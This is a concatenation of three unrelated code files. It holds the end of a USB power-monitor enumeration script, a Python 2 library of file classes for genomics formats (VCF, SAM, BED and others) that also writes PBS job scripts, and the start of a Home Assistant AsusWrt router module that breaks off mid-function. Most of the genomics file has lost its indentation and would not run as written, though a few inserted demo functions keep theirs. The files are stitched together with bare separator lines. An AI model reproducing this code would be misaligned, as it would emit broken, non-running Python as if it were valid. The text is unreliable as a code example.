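# serial numbers of all attached Power Monitors using the native backend.
if __name__ == "__main__":
    probe = USB_protocol()
    for serial in probe.enumerateDevices():
        print("Found Power Monitor: " + serial)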
|
|
#!/usr/bin/env python
'''
V2015-05-03
'''
import os
import csv
from itertools import ifilter
import sys
"""
COMMON FUNCTIONS
"""
def output_header_file_old(infile,skip,output_handle,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
for i in xrange(skip):
if len(sup_list)!=0:
initial_rows=reader.next()
rows=initial_rows+sup_list
else:
rows=reader.next()
if skip==0:
pass
else:
output_row(output_handle,rows,eliminate)
def output_column_descriptor(infile):
reader=csv.reader(open(infile,"rU"),delimiter="\t")
column_descriptor_list = []
for row in reader:
test2=row[0][0:2]
test1=row[0][0:1]
if test2=="##":
pass
elif test1=="#":
column_descriptor_list=row[:]
else:
break
return column_descriptor_list
def output_header_file(infile,output_handle,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
for row in reader:
test2=row[0][0:2]
test1=row[0][0:1]
if test2=="##":
output_row(output_handle,row)
elif test1=="#":
output_row(output_handle,row+sup_list)
else:
break
def output_header_VCF_file(infile,output_handle,cmd_record,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
first_line=True
description_output=False
for row in reader:
#if first_line!=True and (row[0][0:17]=="##fileformat=VCFv"):
# continue
if row[0][0:2]=="##":
if first_line and row[0][0:18]!="##fileformat=VCFv4":
output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row)
if cmd_record!="":
output_handle.write(cmd_record)
elif first_line and row[0][0:18]=="##fileformat=VCFv4":
output_row(output_handle,row)
if cmd_record!="":
output_handle.write(cmd_record)
else:
#output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row)
elif row[0][0]=="#" and row[0][1]!="#":
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
if eliminate==0:
combined_row=row+sup_list
else:
combined_row=row[:(-1)*eliminate]+sup_list
output_row(output_handle,combined_row)
description_output=True
else:
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
print "quit early"
break
first_line=False
if description_output==False:
        description_list=["#CHROM","POS","ID","REF","ALT","QUAL","FILTER","INFO","FORMAT"]
description_list=description_list+sup_list
output_row(output_handle,description_list)
def output_header_VCF_file_replace(infile,output_handle,cmd_record,sup_list=[],eliminate=0):
##Version1.0
##write header into files
reader=csv.reader(open(infile,"rU"),delimiter="\t")
first_line=True
for row in reader:
#if first_line!=True and (row[0][0:17]=="##fileformat=VCFv"):
# continue
if row[0][0:2]=="##":
if first_line and row[0][0:18]!="##fileformat=VCFv4":
output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row,eliminate)
if cmd_record!="":
output_handle.write(cmd_record)
elif first_line and row[0][0:18]=="##fileformat=VCFv4":
output_row(output_handle,row,eliminate)
if cmd_record!="":
output_handle.write(cmd_record)
else:
#output_handle.write("##fileformat=VCFv4.0\n")
output_row(output_handle,row,eliminate)
elif row[0][0]=="#" and row[0][1]!="#":
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
#combined_row=row+sup_list
#output_row(output_handle,combined_row,eliminate)
else:
if first_line==True:
output_handle.write("##fileformat=VCFv4.0\n")
if cmd_record!="":
output_handle.write(cmd_record)
print "quit early"
break
first_line=False
def output_row(handle,row,eliminate=0):
##write row into files
len_row=len(row)-eliminate
for i in xrange(len_row):
if i==(len_row-1):
handle.write(str(row[i])+'\n')
else:
handle.write(str(row[i])+'\t')
def get_file_name(full_name):
if full_name.count("/")==0:
return full_name
else:
full_name_list=full_name.split("/")
return full_name_list[-1]
def get_path(full_name):
full_name_list=full_name.split("/")
full_name_len=len(full_name_list)
path=""
for index in range(1,full_name_len-1):
path=path+"/"+full_name_list[index]
return path
"""
COMMON FUNCTIONS
"""
class GeneralFile_class:
def __init__(self,name):
self.filename=name
self.name_only=get_file_name(name)
self.path_only=get_path(name)
self.SEP_CHAR='\t'
self.SKIP_HEADER=0
        self.SAMPLE_ID_LEN=1 #this determines how many sections are considered part of the unique ID
self.SAMPLE_ID_POS=0
self.UNIQUE_ID_COLUMN=0
self.FILENAME_SPLIT_CHAR='_'
self.RECORD=""
self.AUTOSKIP_HEADER=True
self.OUTPUT_PATH=os.getcwd()
#self.count_column_number()
def count_column_number(self):
reader=csv.reader(open(self.filename,'rU'),delimiter=self.SEP_CHAR)
rows=reader.next()
self.COLUMN_COUNT=len(rows)
def ID_frequency_dict_gen(self,COLUMN=2,FILEPATH=os.getcwd()):
if '/' in self.filename:
            complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for i in range(self.SKIP_HEADER):
reader.next()
ID_dict=dict()
for rows in reader:
ID=rows[COLUMN]
ID_dict[ID]=0
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for i in range(self.SKIP_HEADER):
reader.next()
for rows in reader:
ID=rows[COLUMN]
ID_dict[ID]+=1
return ID_dict
def generate_sample_id(self):
POS=self.SAMPLE_ID_POS
if '/' not in self.filename:
filename_list=(self.name_only).split(self.FILENAME_SPLIT_CHAR)
else:
infile_path_list=self.filename.split('/')
infile_name=infile_path_list[-1]
filename_list=infile_name.split(self.FILENAME_SPLIT_CHAR)
if self.SAMPLE_ID_LEN==1:
sample_id=filename_list[POS]
else:
filename_list_len=len(filename_list)
if self.SAMPLE_ID_LEN>filename_list_len:
self.SAMPLE_ID_LEN=filename_list_len
for i in range(self.SAMPLE_ID_LEN):
if i == 0 :
sample_id=filename_list[POS]
else:
sample_id+=self.FILENAME_SPLIT_CHAR+filename_list[POS+i]
return sample_id
def outputfilename_gen(self,name_fragment="std_out",suffix="txt",POS=0):
##version2.0
if '/' not in self.filename:
#infile_name_list=(self.filename).split(self.FILENAME_SPLIT_CHAR)
#sample_id=infile_name_list[POS]
sample_id=self.generate_sample_id()
output_filename=sample_id+"_"+name_fragment+'.'+suffix
return output_filename
else:
infile_path_list=self.filename.split('/')
infile_name=infile_path_list[-1]
print "infile_name",infile_name
#infile_name_list=(infile_name).split(self.FILENAME_SPLIT_CHAR)
#sample_id=infile_name_list[POS]
self.name_only=infile_name
sample_id=self.generate_sample_id()
output_filename=sample_id+"_"+name_fragment+'.'+suffix
return output_filename
def sampleID_gen(self):
##version2.0
if self.name_only.count("/")>0:
tmp_list=self.name_only.split("/")
self.name_only=tmp_list[-1]
tmp_list=(self.name_only).split(self.FILENAME_SPLIT_CHAR)
sampleID=tmp_list[self.SAMPLE_ID_POS]
return sampleID
def reader_gen(self,FILEPATH=os.getcwd()):
        ## this section handles Windows-style path separators; more robust handling is still needed
if FILEPATH.count('\\')>0:
FILEPATH=FILEPATH.replace('\\','/')
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
if self.AUTOSKIP_HEADER==True and self.SKIP_HEADER==0:
## this will over-write provided default
skip_number=0
row=reader.next()
while row[0][0]=="#":
skip_number+=1
row=reader.next()
self.SKIP_HEADER=skip_number
#print "current skip header value is", self.SKIP_HEADER
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
for i in range(self.SKIP_HEADER):
reader.next()
return reader
def unique_ID_list_gen(self,reader,unique_ID_column):
unique_ID_list=[]
for row in reader:
unique_ID=row[unique_ID_column]
unique_ID_list.append(unique_ID)
return unique_ID_list
def unique_ID_list_gen_v2(self,reader,unique_ID_column):
## under development
unique_ID_list=[]
for row in reader:
unique_ID=row[unique_ID_column]
unique_ID_list.append(unique_ID)
return unique_ID_list
def output_handle_gen(self,header_file=None,FILEPATH=os.getcwd(),sup_list=[],HEAD_LINE=1):
##Version2.0
##Updated 2012-10-31
        '''
        header_file is the file that contains the header information
        FILEPATH is the path for the output file
        sup_list is the additional annotations added to the output file header
        HEAD_LINE is the number of header lines extracted from the header file and written into the output file
        '''
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
self.handle=open(complete_path,'w')
if self.RECORD=="":
pass
else:
self.handle.write(self.RECORD)
if header_file==None:
pass
else:
output_header_file(header_file,self.handle,sup_list,eliminate=0)
class SVDetectFile_class(GeneralFile_class):
##This file is SVDetect Subtype
SVDetect_CHRO1_COLUMN=0
SVDetect_START1_COLUMN=1
SVDetect_END1_COLUMN=2
SVDetect_CHRO2_COLUMN=3
SVDetect_START2_COLUMN=4
SVDetect_END2_COLUMN=5
SVDetect_TYPE_COLUMN=16
SEP_CHAR='\t'
SKIP_HEADER=0
DIST_THRESHOLD=1000
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.SKIP_HEADER=0
self.CHRO2_COLUMN=3
self.CHRO1_COLUMN=0
self.START1_COLUMN=1
self.END1_COLUMN=2
self.START2_COLUMN=4
self.END2_COLUMN=5
self.ID_COLUMN=-1
def region1_output(self):
return None
def reader_gen(self,FILEPATH=os.getcwd()):
complete_path=FILEPATH + '/' + self.filename
#print "complete_path",complete_path
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for i in range(self.SKIP_HEADER):
reader.next()
return reader
def filter_chro(self,infile_reader,filter_chro,eliminate_ID):
data_dict=dict()
data_list=[]
previous_point=0
for rows in infile_reader:
chro=rows[self.CHRO2_COLUMN]
ID=rows[self.ID_COLUMN]
if filter_chro==chro and ID!=eliminate_ID:
start1=rows[self.START1_COLUMN]
end1=rows[self.END1_COLUMN]
middle_point=int((int(start1)+int(end1))/2)
if previous_point==middle_point:
middle_point+=0.1
previous_point=middle_point
data_dict[middle_point]=rows
data_list.append(middle_point)
#print "data_list,",data_list
'''
for data in data_list:
if data_list.count(data) > 1:
print "Same cooridnate ocurrs, Fix needed"
sys.exit()
'''
data_list.sort()
#print "sorted_data", sorted_data
#print "data_dict", data_dict
return data_list,data_dict
class BEDFile_class(GeneralFile_class):
SEP_CHAR='\t'
# this class can be used for BedGraph format as well
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.SKIP_HEADER=0
self.CHRO_COLUMN=0
self.START_COLUMN=1
self.END_COLUMN=2
self.ID_COLUMN=3
self.SCORE_COLUMN=4
self.STRAND_COLUMN=5
class Indel_GATK_File_class(BEDFile_class):
def __init__(self,name):
BEDFile_class.__init__(self,name)
self.TUMOR_STRAND_COLUMN=17
self.TUMOR_STRAND_COLUMN_SEP=':'
self.TUMOR_STRAND_COLUMN_INFO=1
self.INDEL_COLUMN=3
self.GENE_COLUMN=-1
self.FREQ_COLUMN=21
self.SKIP_HEADER=1
##Not sure why there is a blank column there in the data
class VCF_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.QUAL_COLUMN=5
self.ALT_COLUMN=4
self.REF_COLUMN=3
self.ID_COLUMN=2
self.COOR_COLUMN=1
self.CHRO_COLUMN=0
self.FILTER_COLUMN=6
self.INFO_COLUMN=7
self.FORMAT_COLUMN=8
self.SKIP_HEADER=0
self.SEP_INFO_START_COLUMN=9
self.ALT_SEP_CHAR=','
self.REPLACE_DESCRIPTION=0
self.DESCRIPTION_COLUMN_REMOVAL=0
def check_header(self,FILEPATH=os.getcwd()):
##check the description column and first column
result=0
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for row in reader:
if row[0][0]!="#":
break
else:
if row[0][1:6].upper()=="CHROM":
result=1
return result
def sample_list_gen(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'r'),delimiter=self.SEP_CHAR)
for rows in reader:
first_item=rows[0]
if first_item[0]=='#' and first_item[1]!='#':
sample_list=rows[self.SEP_INFO_START_COLUMN:]
break
else:
pass
return sample_list
def reader_gen(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
skip_count=0
try:
rows=reader.next()
while rows[0][0]=="#":
skip_count+=1
rows=reader.next()
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
for i in range(skip_count):
reader.next()
except:
pass
return reader
def output_sample_info(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
for rows in reader:
if rows[0][0:2]=="##":
pass
else:
sample_info=rows[9:]
break
return sample_info
def output_handle_gen(self,header_file=None,FILEPATH=os.getcwd(),sup_list=[],HEAD_LINE=1):
##Version2.0
##Updated 2012-10-31
        '''
        header_file is the file that contains the header information
        FILEPATH is the path for the output file
        sup_list is the additional annotations added to the output file header
        HEAD_LINE is the number of header lines extracted from the header file and written into the output file
        '''
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
self.handle=open(complete_path,'w')
if header_file==None:
self.handle.write("##fileformat=VCFv4\n")
if self.RECORD=="":
pass
else:
self.handle.write(self.RECORD)
pass
else:
#output_header_file(header_file,self.handle,sup_list,eliminate=0)
if self.REPLACE_DESCRIPTION==0:
##
output_header_VCF_file(header_file,self.handle,self.RECORD,sup_list,eliminate=self.DESCRIPTION_COLUMN_REMOVAL)
else:
output_header_VCF_file_replace(header_file,self.handle,self.RECORD,sup_list,eliminate=self.DESCRIPTION_COLUMN_REMOVAL)
def sample_count(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR)
sample_count=0
for rows in reader:
if rows[0][0]=="#":
pass
else:
sample_info=rows[9:]
for sample_data in sample_info:
if sample_data.count(":")==2:
sample_count+=1
elif sample_data=="./.":
sample_count+=1
else:
pass
break
return sample_count
def variant_list_gen(self):
variant_dict=dict()
infile_reader=self.reader_gen()
for row in infile_reader:
chro=row[self.CHRO_COLUMN]
coor=row[self.COOR_COLUMN]
ref=row[self.REF_COLUMN]
alt=row[self.ALT_COLUMN]
unique_ID=chro+"_"+coor+"_"+ref+"_"+alt
variant_dict[unique_ID]=[]
return variant_dict
def add_to_filter_column(self,vcf_row,additional_filter):
current_filter=vcf_row[self.FILTER_COLUMN]
new_filter=current_filter+";" + additional_filter
new_vcf_row=vcf_row[:]
new_vcf_row[self.FILTER_COLUMN]=new_filter
return new_vcf_row
class PBS_File_class(GeneralFile_class):
def __init__(self,name,path=os.getcwd()):
GeneralFile_class.__init__(self,name)
self.email="zhangliy@bu.edu"
self.memory="2g"
self.suffix='pbs'
self.PROJECT="montilab-p"
self.MACHINE="scc"
self.RUNTIME_LIMIT="96:00:00"
#self.
#GeneralFile_class.output_handle_gen(self,FILEPATH=path)
def output_pbs(self,command_line_list):
self.output_handle_gen()
if self.MACHINE=="scc":
self.handle.write("source ~/.bashrc\n")
self.handle.write("#!bin/bash\n")
self.handle.write("#$ -l h_rt="+self.RUNTIME_LIMIT+'\n')
self.handle.write("\n")
else:
self.handle.write("#!bin/bash\n")
self.handle.write("#\n")
self.handle.write("\n")
self.handle.write("#Specify which shell to use\n")
self.handle.write("#$ -S /bin/bash\n")
self.handle.write("\n")
self.handle.write("#Run on the current working folder\n")
self.handle.write("#$ -cwd\n")
self.handle.write("\n")
self.handle.write("#Given this job a name\n")
if self.filename.count("/")>=1:
filename_info_list=self.filename.split("/")
filename_info=filename_info_list[-1]
else:
filename_info=self.filename
self.handle.write("#$ -N S"+filename_info+'\n')
self.handle.write("\n")
self.handle.write("#Join standard output and error to a single file\n")
self.handle.write("#$ -j y\n")
self.handle.write("\n")
self.handle.write("# Name the file where to redict standard output and error\n")
if self.filename.count("/")>=1:
filename_info_list=self.filename.split("/")
filename_info=filename_info_list[-1]
else:
filename_info=self.filename
self.handle.write("#$ -o "+ filename_info +".qlog\n")
self.handle.write("\n")
self.handle.write("# Project this job belongs to \n")
self.handle.write("#$ -P " + self.PROJECT+ " \n")
self.handle.write("\n")
self.handle.write("# Send an email when the job begins and when it ends running\n")
self.handle.write("#$ -m be\n")
self.handle.write("\n")
        if (self.email).lower()!="no":
self.handle.write("# Whom to send the email to\n")
self.handle.write("#$ -M "+self.email+ "\n")
self.handle.write("\n")
self.handle.write("# memory usage\n")
self.handle.write("#$ -l mem_free="+self.memory+ "\n")
self.handle.write("\n")
self.handle.write("# Now let's Keep track of some information just in case anything go wrong\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.write("echo "+'"'+"Starting on : $(date)"+'"'+ "\n")
self.handle.write("echo "+'"'+"Running on node : $(hostname)"+'"'+"\n")
self.handle.write("echo "+'"'+"Current directory : $(pwd)"+'"'+"\n")
self.handle.write("echo "+'"'+"Current job ID : $JOB_ID"+'"'+"\n")
self.handle.write("echo "+'"'+"Current job name : $JOB_NAME"+'"'+"\n")
self.handle.write("echo "+'"'+"Task index number : $TASK_ID"+'"'+"\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.write("\n")
for command_line in command_line_list:
self.handle.write(command_line)
self.handle.write('\n')
self.handle.write("\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.write("echo "+'"'+"Finished on : $(date)"+'"'+ "\n")
self.handle.write("echo "+'"'+"========================================" + '"'+'\n')
self.handle.close()
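## Illustrative sketch (not part of the original code): generate a minimal
## submission script that runs a single command. The job filename and command
## below are placeholders.
def _demo_pbs_script():
    pbs=PBS_File_class("demo_job.pbs")
    pbs.email="no"                 # skip the email directives
    pbs.RUNTIME_LIMIT="01:00:00"
    pbs.output_pbs(["echo hello world"])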
class PSL_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.MATCH_COLUMN=0
self.MISMATCH_COLUMN=1
self.QUERY_INSERTION_COUNT_COLUMN=4
self.QUERY_INSERTION_LEN_COLUMN=5
self.REF_INSERTION_COUNT_COLUMN=6
self.REF_INSERTION_LEN_COLUMN=7
self.STRAND_COLUMN=8
self.QUERY_ID_COLUMN=9
self.QUERY_LEN_COLUMN=10
self.QUERY_START_COLUMN=11
self.QUERY_END_COLUMN=12
self.REF_ID_COLUMN=13
self.REF_LEN_COLUMN=14
self.REF_START_COLUMN=15
self.REF_END_COLUMN=16
self.BLOCK_COUNT_COLUMN=17
self.BLOCK_SIZE_COLUMN=18
self.QUERY_STARTS_COLUMN=19
self.REF_STARTS_COLUMN=20
self.AUTOSKIP_HEADER=False
self.SKIP_HEADER=5
def output_handle_gen(self,header_file=None,FILEPATH=os.getcwd(),sup_list=[],HEAD_LINE=1):
##Version2.0
##Updated 2012-10-31
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
self.handle=open(complete_path,'w')
if self.RECORD=="":
pass
else:
self.handle.write(self.RECORD)
reader=csv.reader(open(header_file,"rU"),delimiter="\t")
for index in range(self.SKIP_HEADER):
row=reader.next()
output_row(self.handle,row)
if index==0:
self.handle.write('\n')
class SAM_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.QNAME_COLUMN=0
self.FLG_COLUMN=1
self.CHRO_COLUMN=2
self.COOR_COLUMN=3
self.MAPQ_COLUMN=4
self.CIGAR_COLUMN=5
self.RNEXT_COLUMN=6
self.PNEXT_COLUMN=7
self.TLEN_COLUMN=8
self.SEQ_COLUMN=9
self.QUAL_COLUMN=10
self.READGROUP_COLUMN=12
self.MULTI_ALIGNMENT_COLUMN=12 ## for the new bwa result version at least
self.SKIP_HEADER=0
def reader_gen(self,FILEPATH=os.getcwd()):
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
if self.AUTOSKIP_HEADER==True:
## this will over-write provided default
skip_number=0
row=reader.next()
while row[0][0]=="@":
skip_number+=1
row=reader.next()
self.SKIP_HEADER=skip_number
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
for i in range(self.SKIP_HEADER):
reader.next()
return reader
def ref_dict_gen(self,FILEPATH=os.getcwd()):
        ## this function outputs the reference chromosomes and their lengths into a dict
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(open(complete_path,'rU'),delimiter=self.SEP_CHAR,quoting=csv.QUOTE_NONE)
row=reader.next()
ref_dict= dict()
while row[0][0]=="@":
if row[0][1:3]=="SQ":
ref_name=row[1][3:]
ref_length=int(row[2][3:])
ref_dict[ref_name]=ref_length
row=reader.next()
return ref_dict
class GTF_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.CHRO_COLUMN=0
self.SOURCE_COLUMN=1
self.FEATURE_COLUMN=2
self.START_COLUMN=3
self.END_COLUMN=4
self.SCORE_COLUMN=5
self.STRAND_COLUMN=6
self.FRAME_COLUMN=7
self.ATTRIBUTE_COLUMN=8
self.SKIP_HEADER=0
class MPILEUP_SINGLE_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.CHRO_COLUMN=0
self.COOR_COLUMN=1
self.REF_COLUMN=2
self.COUNT_COLUMN=3
self.INFO_COLUMN=4
self.QUALITY_COLUMN=5
self.SKIP_HEADER=0
class GZ_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
def reader_gen(self,FILEPATH=os.getcwd()):
import gzip
if '/' in self.filename:
complete_path=self.filename
else:
complete_path=FILEPATH + '/' + self.filename
reader=csv.reader(gzip.open(complete_path),delimiter=self.SEP_CHAR)
return reader
class BLASTN6_File_class(GeneralFile_class):
def __init__(self,name):
GeneralFile_class.__init__(self,name)
self.QUERY_ID_COLUMN=0
self.REF_ID_COLUMN=1
self.OVERLAP_PERCENTAGE_COLUMN=2
self.OVERLAP_LENGTH_COLUMN=3
self.MISMATCH_COLUMN=4
self.GAP_COLUMN=5
self.QUERY_START_COLUMN=6
self.QUERY_END_COLUMN=7
self.REF_START_COLUMN=8
self.REF_END_COLUMN=9
self.EVALUE_COLUMN=10
self.BITSCORE_COLUMN=11
self.SKIP_HEADER=0
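## Illustrative usage (not part of the original script): count the variant
## records in a VCF file; reader_gen() skips the header lines automatically.
## The default path below is a placeholder.
def _demo_vcf_record_count(vcf_path="example.vcf"):
    vcf=VCF_File_class(vcf_path)
    count=0
    for row in vcf.reader_gen():
        count+=1
    return count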
|
|
"""Represent the AsusWrt router."""
from __future__ import annotations
from collections.abc import Callable
from datetime import datetime, timedelta
import logging
from typing import Any
from aioasuswrt.asuswrt import AsusWrt
from homeassistant.components.device_tracker.const import (
CONF_CONSIDER_HOME,
DEFAULT_CONSIDER_HOME,
DOMAIN as TRACKER_DOMAIN,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (
CONF_HOST,
CONF_MODE,
CONF_PASSWORD,
CONF_PORT,
CONF_PROTOCOL,
CONF_USERNAME,
)
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.exceptions import ConfigEntryNotReady
from homeassistant.helpers.dispatcher import async_dispatcher_send
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
from homeassistant.util import dt as dt_util
from .const import (
CONF_DNSMASQ,
CONF_INTERFACE,
CONF_REQUIRE_IP,
CONF_SSH_KEY,
CONF_TRACK_UNKNOWN,
DEFAULT_DNSMASQ,
DEFAULT_INTERFACE,
DEFAULT_TRACK_UNKNOWN,
DOMAIN,
PROTOCOL_TELNET,
SENSORS_BYTES,
SENSORS_CONNECTED_DEVICE,
SENSORS_LOAD_AVG,
SENSORS_RATES,
)
CONF_REQ_RELOAD = [CONF_DNSMASQ, CONF_INTERFACE, CONF_REQUIRE_IP]
KEY_COORDINATOR = "coordinator"
KEY_SENSORS = "sensors"
SCAN_INTERVAL = timedelta(seconds=30)
SENSORS_TYPE_BYTES = "sensors_bytes"
SENSORS_TYPE_COUNT = "sensors_count"
SENSORS_TYPE_LOAD_AVG = "sensors_load_avg"
SENSORS_TYPE_RATES = "sensors_rates"
_LOGGER = logging.getLogger(__name__)
def _get_dict(keys: list, values: list) -> dict[str, Any]:
"""Create a dict from a list of keys and values."""
ret_dict: dict[str, Any] = dict.fromkeys(keys)
for index, key in enumerate(ret_dict):
ret_dict[key] = values[index]
return ret_dict
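# For example (illustrative): _get_dict(["rx", "tx"], [125000, 30000])
# returns {"rx": 125000, "tx": 30000}.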
class AsusWrtSensorDataHandler:
"""Data handler for AsusWrt sensor."""
def __init__(self, hass, api):
"""Initialize a AsusWrt sensor data handler."""
self._hass = hass
self._api = api
self._connected_devices = 0
async def _get_connected_devices(self):
"""Return number of connected devices."""
return {SENSORS_CONNECTED_DEVICE[0]: self._connected_devices}
async def _get_bytes(self):
"""Fetch byte information from the router."""
try:
datas = await self._api.async_get_bytes_total()
except (OSError, ValueError) as exc:
raise UpdateFailed(exc) from exc
return _get_dict(SENSORS_BYTES, datas)
async def _get_rates(self):
"""Fetch rates information from the router."""
try:
rates = await self._api.async_get_current_transfer_rates()
except (OSError, ValueError) as exc:
raise UpdateFailed(exc) from exc
return _get_dict(SENSORS_RATES, rates)
async def _get_load_avg(self):
"""Fetch load average information from the router."""
try:
avg = await self._api.async_get_loadavg()
except (OSError, ValueError) as exc:
raise UpdateFailed(exc) from exc
return _get_dict(SENSORS_LOAD_AVG, avg)
def update_device_count(self, conn_devices: int):
"""Update connected devices attribute."""
if self._connected_devices == conn_devices:
return False
self._connected_devices = conn_devices
return True
async def get_coordinator(self, sensor_type: str, should_poll=True):
"""Get the coordinator for a specific sensor type."""
if sensor_type == SENSORS_TYPE_COUNT:
method = self._get_connected_devices
elif sensor_type == SENSORS_TYPE_BYTES:
method = self._get_bytes
elif sensor_type == SENSORS_TYPE_LOAD_AVG:
method = self._get_load_avg
elif sensor_type == SENSORS_TYPE_RATES:
method = self._get_rates
else:
raise RuntimeError(f"Invalid sensor type: {sensor_type}")
coordinator = DataUpdateCoordinator(
self._hass,
_LOGGER,
name=sensor_type,
update_method=method,
# Polling interval. Will only be polled if there are subscribers.
update_interval=SCAN_INTERVAL if should_poll else None,
)
await coordinator.async_refresh()
return coordinator
class AsusWrtDevInfo:
"""Representation of a AsusWrt device info."""
def __init__(self, mac, name=None):
"""Initialize a AsusWrt device info."""
self._mac = mac
self._name = name
self._ip_address = None
self._last_activity = None
self._connected = False
def update(self, dev_info=None, consider_home=0):
"""Update AsusWrt device info."""
utc_point_in_time = dt_util.utcnow()
if dev_info:
if not self._name:
self._name = dev_info.name or self._mac.replace(":", "_")
self._ip_address = dev_info.ip
self._last_activity = utc_point_in_time
self._connected = True
elif self._connected:
self._connected = (
utc_point_in_time - self._last_activity
).total_seconds() < consider_home
self._ip_address = None
@property
def is_connected(self):
"""Return connected status."""
return self._connected
@property
def mac(self):
"""Return device mac address."""
return self._mac
@property
def name(self):
"""Return device name."""
return self._name
@property
def ip_address(self):
"""Return device ip address."""
return self._ip_address
@property
def last_activity(self):
"""Return device last activity."""
return self._last_activity
class AsusWrtRouter:
"""Representation of a AsusWrt router."""
def __init__(self, hass: HomeAssistant, entry: ConfigEntry) -> None:
"""Initialize a AsusWrt router."""
self.hass = hass
self._entry = entry
self._api: AsusWrt = None
self._protocol = entry.data[CONF_PROTOCOL]
self._host = entry.data[CONF_HOST]
self._model = "Asus Router"
self._sw_v: str | None = None
self._devices: dict[str, Any] = {}
self._connected_devices = 0
self._connect_error = False
self._sensors_data_handler: AsusWrtSensorDataHandler | None = None
self._sensors_coordinator: dict[str, Any] = {}
self._on_close: list[Callable] = []
self._options = {
CONF_DNSMASQ: DEFAULT_DNSMASQ,
CONF_INTERFACE: DEFAULT_INTERFACE,
CONF_REQUIRE_IP: True,
}
self._options.update(entry.options)
async def setup(self) -> None:
"""Set up a AsusWrt router."""
self._api = get_api(dict(self._entry.data), self._options)
try:
await self._api.connection.async_connect()
except OSError as exp:
raise ConfigEntryNotReady from exp
if not self._api.is_connected:
raise ConfigEntryNotReady
# System
model = await _get_nvram_info(self._api, "MODEL")
if model and "model" in model:
self._model = model["model"]
firmware = await _get_nvram_info(self._api, "FIRMWARE")
if firmware and "firmver" in firmware and "buildno" in firmware:
self._sw_v = f"{firmware['firmver']} (build {firmware['buildno']})"
# Load tracked entities from registry
entity_registry = await self.hass.helpers.entity_registry.async_get_registry()
track_entries = (
self.hass.helpers.entity_registry.async_entries_for_config_entry(
entity_registry, self._entry.entry_id
)
)
for entry in track_entries:
if entry.domain == TRACKER_DOMAIN:
self._devices[entry.unique_id] = AsusWrtDevInfo(
entry.unique_id, entry.original_name
)
# Update devices
await self.update_devices()
# Init Sensors
await self.init_sensors_coordinator()
self.async_on_close(
async_track_time_interval(self.hass, self.update_all, SCAN_INTERVAL)
)
async def update_all(self, now: datetime | None = None) -> None:
"""Update all AsusWrt platforms."""
await self.update_devices()
async def update_devices(self) -> None:
"""Update AsusWrt devices tracker."""
new_device = False
_LOGGER.debug("Checking devices for ASUS router %s", self._host)
try:
wrt_devices = await self._api.async_get_connected_devices()
except OSError as exc:
if not self._connect_error:
